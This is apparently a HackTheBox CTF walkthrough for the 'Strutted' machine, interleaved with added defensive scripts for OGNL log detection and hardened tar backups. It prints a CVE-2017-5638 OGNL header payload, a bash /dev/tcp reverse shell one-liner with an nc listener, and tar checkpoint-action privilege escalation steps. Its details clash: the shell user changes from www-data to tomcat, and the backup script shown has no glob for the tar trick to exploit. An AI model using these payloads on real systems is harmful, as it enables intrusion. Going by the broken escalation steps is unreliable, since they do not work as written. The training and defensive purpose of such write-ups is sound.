Strutted - HackTheBox Walkthrough | Style

Machine Name: Strutted
Platform: HackTheBox
Difficulty: Easy
Category: Web Exploitation, Privilege Escalation
Tools Used: Nmap, curl, SearchSploit, Bash Reverse Shell, tar, sudo

Step 1: Enumeration

🔍 Nmap Scan

We start by scanning the machine with Nmap:

nmap -sC -sV -oN nmap_initial 10.10.11.59

Nmap reveals port 80 open with an HTTP server running Apache Tomcat (Apache-Coyote/1.1).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

🔍 HTTP Header Check

We verify with a manual curl check:

curl -I http://strutted.htb

The server responds with:

Server: Apache-Coyote/1.1

We're dealing with Apache Tomcat. The box name "Strutted" hints at a vulnerable Apache Struts component behind it.


Step 2: Vulnerability Discovery

We use SearchSploit to find a related vulnerability:

searchsploit struts

One interesting result:

Apache Struts 2.5 - Remote Code Execution (CVE-2017-5638)

We copy the exploit locally:

searchsploit -m java/remote/42966.java

The exploit places an OGNL expression in the Content-Type header. Struts' Jakarta multipart parser evaluates that expression while building an error message for the unexpected Content-Type, which gives remote code execution.


Step 3: Remote Code Execution

To test if the exploit works, we use a simple curl request like this:

curl -v -H "Content-Type: %{(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','RCE'))}.multipart/form-data" http://strutted.htb

Check for X-Test: RCE in the response headers.

✅ Confirmed: We Have RCE

Let's now craft a reverse shell.
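Here is the same test request seen from the defender's side. This is an added example, not code from the original writeup: a small bash script that scans a Tomcat access log for the OGNL markers that CVE-2017-5638 probes carry in the Content-Type header. It assumes the AccessLogValve pattern has been extended to record that header (for example by appending "%{Content-Type}i" to the pattern); Tomcat's default pattern does not log it. The log lines below are constructed for the example.

```bash
#!/bin/bash
# Added example (not from the original writeup): flag CVE-2017-5638-style
# OGNL injection attempts by scanning a Tomcat access log whose pattern
# records the Content-Type request header as its last field.
# Assumption: the AccessLogValve pattern ends with %{Content-Type}i.

# Print every log line whose Content-Type carries OGNL markers.
# Exit status 0 when something was flagged, 1 when the log is clean.
flag_ognl_requests() {
    logfile="$1"
    # %{ opens an OGNL expression (the Jakarta parser evaluated it);
    # %25%7B is the same thing URL-encoded; #context is the object the
    # public probe (and the curl check above) reaches into.
    grep -E -i '%\{|%25%7B|#context' "$logfile"
}

# Number of flagged lines, for alert thresholds and tests.
count_ognl_requests() {
    flag_ognl_requests "$1" | wc -l | tr -d ' '
}

# Constructed sample log (not a real capture). The quoted value at the end
# of each line is the Content-Type header as recorded by %{Content-Type}i.
SAMPLE_LOG="$(mktemp)"
cat > "$SAMPLE_LOG" <<'EOF'
10.10.14.25 - - [01/Jan/2025:10:00:00 +0000] "GET / HTTP/1.1" 200 1024 "text/html"
10.10.14.25 - - [01/Jan/2025:10:00:05 +0000] "GET / HTTP/1.1" 200 1024 "%{(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','RCE'))}.multipart/form-data"
10.10.14.25 - - [01/Jan/2025:10:00:09 +0000] "POST /upload HTTP/1.1" 200 512 "multipart/form-data; boundary=----abc"
10.10.14.25 - - [01/Jan/2025:10:00:12 +0000] "GET / HTTP/1.1" 200 1024 "%25%7B(%23context%5B'com.opensymphony.xwork2.dispatcher.HttpServletResponse'%5D.addHeader('X-Test','RCE'))%7D.multipart/form-data"
EOF

# Stand-alone run: print the offending lines and an alert count.
if flag_ognl_requests "$SAMPLE_LOG"; then
    echo "ALERT: $(count_ognl_requests "$SAMPLE_LOG") suspicious Content-Type header(s) in $SAMPLE_LOG"
fi
```

Point it at the real access log instead of the constructed sample; the same signature ("%{" or its URL-encoded form in Content-Type) also fits a WAF or IDS rule. Detection is a stopgap: the fix is upgrading Struts to a release without the vulnerable Jakarta multipart parser (2.3.32 / 2.5.10.1 or later).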


Step 4: Getting a Reverse Shell

We use the bash one-liner reverse shell:

bash -i >& /dev/tcp/10.10.14.25/4444 0>&1

We encode this payload and modify the original exploit to deliver it.

On your attacker machine, set up a listener:

nc -lvnp 4444

Once the exploit runs, you'll catch a shell:

bash: no job control in this shell
www-data@strutted:/var/lib/tomcat8$

We have a shell as www-data.


Step 5: Privilege Escalation

🔍 Check sudo privileges:

sudo -l

You might see:

User tomcat may run the following command on strutted:
    (root) NOPASSWD: /opt/backup.sh

🔍 Inspect the Script

cat /opt/backup.sh

Inside:

#!/bin/bash
tar -czf /root/backup.tar.gz /root/important

The tar wildcard trick applies when a script run as root passes a shell glob (for example a trailing "*") from a directory we can write to: the shell expands our crafted filenames onto tar's command line, and tar parses them as options.

🔓 Exploiting with Tar

We’ll use --checkpoint-action=exec=... to execute code:

mkdir exploit
cd exploit
# payload.sh lives in the same directory as the crafted filenames,
# so "sh payload.sh" resolves when tar runs the checkpoint action here
echo 'touch /tmp/pwned' > payload.sh
chmod +x payload.sh
echo "" > "--checkpoint-action=exec=sh payload.sh"
echo "" > "--checkpoint=1"

sudo /opt/backup.sh

Check /tmp/pwned: if it exists, we've achieved code execution as root.
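The defender's side of this trick, as an added example that is not the box's /opt/backup.sh: a backup function written so that filenames can never reach tar as options, plus a self-check that plants files named like the checkpoint options above and confirms they are archived as plain data while nothing executes. The paths and names in the demonstration are constructed for the example.

```bash
#!/bin/bash
# Added example (not the box's /opt/backup.sh): a backup routine hardened
# against the tar checkpoint trick. Two rules: never hand tar a shell glob
# from a directory untrusted users can write to, and end option parsing
# with '--' so anything that follows is a path, never an option.

# safe_backup SRC_DIR OUT_TGZ
# Archives the contents of SRC_DIR. tar enters the directory with -C and
# archives '.', so member names never appear on its command line at all.
safe_backup() {
    src="$1"
    out="$2"
    tar -czf "$out" -C "$src" -- .
}

# Self-check: a directory holding files named like tar options (the same
# names the writeup uses) and a marker that would appear only if tar ever
# executed the embedded command. Returns 0 when the hardening holds.
demo_safe_backup() {
    work="$(mktemp -d)"
    marker="$work/executed"
    data="$work/data"
    mkdir -p "$data"
    echo "real data" > "$data/notes.txt"
    # Crafted names: parsed as options, they would create the marker.
    : > "$data/--checkpoint=1"
    : > "$data/--checkpoint-action=exec=touch $marker"

    safe_backup "$data" "$work/backup.tar.gz"

    # 1. No command ran: the marker must not exist.
    [ ! -e "$marker" ] || return 1
    # 2. The crafted names went into the archive as ordinary members.
    tar -tzf "$work/backup.tar.gz" | grep -q -- '--checkpoint=1' || return 1
    tar -tzf "$work/backup.tar.gz" | grep -q 'notes.txt' || return 1
    rm -rf "$work"
    return 0
}

# Stand-alone run.
if demo_safe_backup; then
    echo "safe_backup: crafted filenames archived as data, nothing executed"
else
    echo "safe_backup: check failed" >&2
    exit 1
fi
```

Two things make the difference: -C with '.' keeps member names off the command line entirely, and '--' ends option parsing for whatever follows it. The other half of the fix is policy: a NOPASSWD sudo entry should point at a script that root owns, that nobody else can write, and that never globs a directory low-privileged users control.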

🔍 Spawn a Root Shell

Replace payload with a reverse shell or setuid bash binary.


Final Flag

Once you have root, grab the root flag:

cat /root/root.txt

Mission complete.


Conclusion

The Strutted machine is a great beginner-friendly box to learn:

  • Apache Struts RCE (CVE-2017-5638)
  • Bash reverse shell delivery
  • Privilege escalation with tar checkpoint trick

This is a real-world example of chaining web exploits and system misconfigurations.


Credits

🔗 Walkthrough: Strutted - HackTheBox


https://medium.com/@sivaaditya456

Thanks for reading! Follow me on Medium for more CTF & Red Team writeups.
